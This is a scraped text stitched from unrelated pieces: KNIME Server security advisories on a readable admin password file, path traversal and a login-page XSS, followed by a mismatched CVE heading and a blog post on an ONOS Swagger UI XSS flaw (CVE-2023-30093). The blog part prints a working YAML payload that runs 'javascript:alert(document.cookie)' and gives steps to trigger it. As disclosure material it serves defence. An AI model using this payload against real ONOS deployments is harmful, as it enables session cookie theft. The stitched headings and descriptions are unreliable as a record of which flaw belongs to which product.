*   Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

KNIME Server before 4.12.6 and 4.13.x before 4.13.4 (when installed in unattended mode) keeps the administrator's password in a file without appropriate file access controls, allowing all local users to read its content.

The vulnerability was found and reported by Dawid Czarnecki from NATO.

**CVE-2021-44725 - Directory path traversal when requesting client profiles**

*   Published: 2021-12-07
*   Affected Product: KNIME Server between 4.7.0 and below 4.11.6, 4.12.5, 4.13.4, respectively
*   Base CVSS Score: 7.5
*   Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

The server managed customizations functionality of KNIME Server starting at version 4.7.0 is vulnerable to Directory Path Traversal attacks. By manipulating variables that reference files by prepending “dot-dot-slash (../)” sequences and their variations or by using absolute file paths, it is possible to access arbitrary files and directories stored on the file system including application source code, configuration, and database. Due to the file-based architecture of KNIME Server, this vulnerability allows stealing users' data  
such as password hashes, workflows, licenses, jobs, and so on. No authentication is required to exploit this vulnerability.

The issue is fixed in KNIME Server 4.13.4, 4.12.5, and 4.11.6 which have been released today. All customers are advised to update their server's immediately.

**Workaround**

If you cannot update right away you can apply the following workaround which prevents access to client profiles for any user:

1.  Locate _<apache-tomcat>/webapps/knime/WEB-INF/web.xml_
2.  Edit the file and add the following block before the existing line <deny-uncovered-http-methods /> at the bottom of the file:
    
       ...
       <security-constraint>
          <web-resource-collection>
             <web-resource-name>Profiles
             <url-pattern>/rest/v4/profiles/contents
          </web-resource-collection>
          <auth-constraint />
       </security-constraint>
    
       <deny-uncovered-http-methods />
    </web-app>
    
3.  Restart KNIME Server.

The vulnerability was found and reported by Dawid Czarnecki from NATO.

**CVE-2021-44726 - Cross-Site-Scripting vulnerability in old WebPortal login**

*   Published: 2021-12-07
*   Affected Product: KNIME Server below 4.13.4
*   Base CVSS Score: 8.8
*   Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:L

The old KNIME WebPortal login page up to version 4.13.3 contains a DOM-based XSS vulnerability that once exploited, can be used to run any action as a victim user via malicious JavaScript. If the victim user is an administrator, it could be used to create a new administrator. To exploit the vulnerability it is required to create a specially crafted URL and convince the victim to open it. No authentication is required to exploit the vulnerability, however, authenticated users can be targeted.

The vulnerability was found and reported by Dawid Czarnecki from NATO

CVE-2023-2535: Security Advisories | KNIME

An arbitrary file upload vulnerability in Open Networking Foundation ONOS from version 1.9.0 until 2.7.0 allows attackers to execute arbitrary code via uploading a crafted YAML file.

****CVE-2023-30093****

Author: Edoardo Ottavianelli  
03/05/2023

In this post I will go through CVE-2023-30093: the description, replication of the vulnerability and POC.

ONOS (Open Network Operating System), a product of Open Networking Foundation, is "the leading open source SDN controller for building next-generation SDN/NFV solutions. ONOS was designed to meet the needs of operators wishing to build carrier-grade solutions that leverage the economics of white box merchant silicon hardware while offering the flexibility to create and deploy new dynamic network services with simplified programmatic interfaces. ONOS supports both configuration and real-time control of the network, eliminating the need to run routing and switching control protocols inside the network fabric. By moving intelligence into the ONOS cloud controller, innovation is enabled and end-users can easily create new network applications without the need to alter the dataplane systems."

Among ONOS users we can see Comcast, Deutsche Telekom, AT&T and other big companies.

The ONOS platform includes:

*   A platform and a set of applications that act as an extensible, modular, distributed SDN controller.
*   Simplified management, configuration and deployment of new software, hardware & services.
*   A scale-out architecture to provide the resiliency and scalability required to meet the rigors of production carrier environments.

**Description of the vulnerability**

Since version v1.9.0 (https://github.com/opennetworkinglab/onos/releases/tag/1.9.0) until 2.7.0 (https://github.com/opennetworkinglab/onos/releases/tag/2.7.0) included, ONOS uses Swagger as dependency. In particular ("Swagger UI allows anyone — be it your development team or your end consumers — to visualize and interact with the API's resources without having any of the implementation logic in place. It's automatically generated from your OpenAPI (formerly known as Swagger) Specification, with the visual documentation making it easy for back end implementation and client side consumption."), a vulnerable Swagger UI version (v2.2.10). We can use an external file to specify how the API are built using the \`url\` parameter, but since the authorizationUrl (securityDefinitions > OAuth2 > authorizationUrl) is not properly sanitized, this will result in a cross site scripting injection.

Payload:

swagger: "2.0"
info:
    title: edoardottt XSS
    description: XSS ONOS POC
    version: 1.0.0
host: edoardoottavianelli.it
basePath: /v1
schemes:
    - https

securityDefinitions:
    OAuth2:
        type: oauth2
        flow: accessCode
        authorizationUrl: javascript:alert(document.cookie)//
        tokenUrl: https://example.com/oauth/token
        scopes:
            read: Grants read access
            write: Grants write access
            admin: Grants read and write access to administrative information
                            

**Replication of the vulnerability**

*   Start ONOS locally (**bazel run onos-local**)
*   Visit http://localhost:8181/onos/v1/docs/?url=URL-PAYLOAD-FILE
*   URL-PAYLOAD-FILE is the URL pointing to the YAML file containing the payload (could be a GitHub gist)
*   The victim will see a page like this:

If the victim clicks on the Authorize button on the right upper corner, then check at least one of read, write, admin and click the Authorize button in the central window the javascript payload will be executed.

**POC**

See the Youtube Video POC here:

**References**

*   https://nvd.nist.gov/vuln/detail/CVE-2023-30093
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30093
*   https://www.youtube.com/embed/jZr2JhDd\_S8
*   https://github.com/edoardottt/offensive-onos/

Tag

#java